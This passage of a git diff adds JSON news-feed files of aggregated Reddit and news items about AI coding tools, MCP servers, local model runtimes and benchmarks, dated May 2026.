"agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-15T00:23:24.000Z", + "summary": "I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \\-Turning articles and books into personalized learning objects \\- lecture notes with automatically maintained structure \\-documents with embedded code, tables, consoles, images, audio, or video \\-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat…", + "category": "ai_tools" + }, + { + "title": "Memory drift? Context bloat? A Claude Code skill I wrote to manage long-running memory libraries", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.99, + "date": "2026-05-15T11:34:28.000Z", + "summary": "I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for \"that bug we fixed last month\" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** \"Audit memory\" runs the script. \"Review session\" walks the recent session and surfaces what's worth keeping.…", + "category": "ai_tools" + }, + { + "title": "SailPoint Unveils Agentic Fabric for AI Agent Security", + "url": "https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security", + "source": "AI Magazine", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-15T18:00:34.440Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Open-weights vs. closed models: Nano Banana Pro was nerf'ed", + "url": "https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-15T23:27:46.000Z", + "summary": "Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \\[dev\\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/…", + "category": "creative_tools" + }, + { + "title": "AllenAI has been iterating on their MolmoAct2 models for robotics", + "url": "https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-15T21:30:46.000Z", + "summary": "r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look.", + "category": "ai_models" + }, + { + "title": "Gemma4 26b MoE running in MLX with turboquant (and custom kernel)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T19:34:12.000Z", + "summary": "TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\\_XS + q4\\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y…", + "category": "ai_models" + }, + { + "title": "Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-15T17:32:50.000Z", + "summary": "Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said \"I don't have inform…", + "category": "ai_research" + }, + { + "title": "Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-15T14:35:49.000Z", + "summary": "Claude Code learns your codebase by brute force every session. A single architectural question such as; \"Where does request validation happen?\" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, \"we did it this way because\" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-16.json b/data/news-feed-2026-05-16.json new file mode 100644 index 0000000..c6a402f --- /dev/null +++ b/data/news-feed-2026-05-16.json @@ -0,0 +1,275 @@ +{ + "generated": "2026-06-05T00:44:40.446Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-16", + "article_count": 15, + "archived_story_count": 407, + "articles": [ + { + "title": "Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T14:50:57.000Z", + "summary": "Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \\- 100 apps (was 50) \\- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \\- back behavior wrong, no system back \\- flat surfaces, no Material elevation \\- tab bar where a nav drawer or bottom nav belongs \\- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \\- Product intent: hierarchy, flow, states. Invariant across platforms. \\- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y…", + "category": "ai_tools" + }, + { + "title": "GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "github_release" + ], + "matching_tags": [ + "api_update", + "open_source", + "github_release" + ], + "importance": 1, + "date": "2026-05-16T18:12:10.000Z", + "summary": "Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm…", + "category": "ai_models" + }, + { + "title": "macOS support in Lemonade has graduated out of beta!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-16T14:40:45.000Z", + "summary": "All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", + "category": "ai_models" + }, + { + "title": "Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result", + "url": "https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-16T08:28:58.000Z", + "summary": "[error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: \"sdk\\_stream\\_ended\\_no\\_result\", had\\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \\[Stall\\] stream\\_idle\\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context?", + "category": "ai_tools" + }, + { + "title": "WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. Does anyone know the solution?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T22:24:17.000Z", + "summary": "Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t…", + "category": "ai_models" + }, + { + "title": "I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned", + "url": "https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T22:14:25.000Z", + "summary": "Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa…", + "category": "ai_tools" + }, + { + "title": "Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.", + "url": "https://www.digg.com/ai/09imapy5?rank=7", + "source": "Digg AI", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-16T20:04:50.938Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "How I started programming differently over the last year. What about you?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-16T18:58:05.000Z", + "summary": "An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t…", + "category": "ai_models" + }, + { + "title": "LLM Phone Home: Reliable Apps that can deliver inference from local backend", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-16T17:02:05.000Z", + "summary": "Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability).", + "category": "ai_models" + }, + { + "title": "Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode", + "url": "https://x.com/frameo_ai/status/2055642282796400821", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-16T14:56:25.012Z", + "summary": "Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers.", + "category": "ai_tools" + }, + { + "title": "How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer", + "url": "https://x.com/Scobleizer/status/2055566706714845328", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-16T14:52:06.433Z", + "summary": "Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework.", + "category": "ai_tools" + }, + { + "title": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T07:19:25.000Z", + "summary": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source!", + "category": "ai_models" + }, + { + "title": "Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?", + "url": "https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.88, + "date": "2026-05-16T13:55:37.000Z", + "summary": "Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \\`--chrome\\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \\*\\*Setup:\\*\\* \\- Claude in Chrome extension installed and signed in \\- Same account on [claude.ai](http://claude.ai) and Claude Code \\- Extension shows as active in Chrome toolbar \\*\\*What works:\\*\\* \\- ✅ Claude Code CLI (\\`claude --chrome\\`) connects to the browser fine \\- ✅ Extension itself appears active and logged in \\- ❌ [claude.ai](http://claude.ai) web app: consistently returns \"Browser extension is not connected\" \\*\\*What I've already tried (nothing helped):\\*\\* \\- Restarted Chrome \\- Restarted PC \\- Logged out and back into [claude.ai](http://claude.ai) \\- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow \"claimed\" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr…", + "category": "ai_tools" + }, + { + "title": "Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin", + "url": "https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-16T18:45:19.000Z", + "summary": "Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \\- YouTube, Instagram, X/Twitter \\- Best / 1080p / 720p / 480p / MP3 \\- Live progress bar with ETA \\- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22", + "category": "ai_tools" + }, + { + "title": "Using Claude chat for making Apps.", + "url": "https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-05-16T14:05:01.000Z", + "summary": "I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-17.json b/data/news-feed-2026-05-17.json new file mode 100644 index 0000000..75d5bae --- /dev/null +++ b/data/news-feed-2026-05-17.json @@ -0,0 +1,267 @@ +{ + "generated": "2026-06-05T00:44:40.711Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-17", + "article_count": 15, + "archived_story_count": 420, + "articles": [ + { + "title": "I built SeeFlow - architecture diagrams that actually run, wired to your live app", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T02:50:20.000Z", + "summary": "Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source", + "category": "ai_tools" + }, + { + "title": "ROCm 7.13 nightly adds strix halo optimizations", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T15:56:56.000Z", + "summary": "[https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 \"Strix Halo\" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module", + "category": "ai_models" + }, + { + "title": "I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!", + "url": "https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-05-17T14:51:01.000Z", + "summary": "Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — \"The one I didn't know I needed\" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **\"Extract Locations from…", + "category": "creative_tools" + }, + { + "title": "Are local models good enough yet for AI meeting memory?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T16:38:58.000Z", + "summary": "I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building 